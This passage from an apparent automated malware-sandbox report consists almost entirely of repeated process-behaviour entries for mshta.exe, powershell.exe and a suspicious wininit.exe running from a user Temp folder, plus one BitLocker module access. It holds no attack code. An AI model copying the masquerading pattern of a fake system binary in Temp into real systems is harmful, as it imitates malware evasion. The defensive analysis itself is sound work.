                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
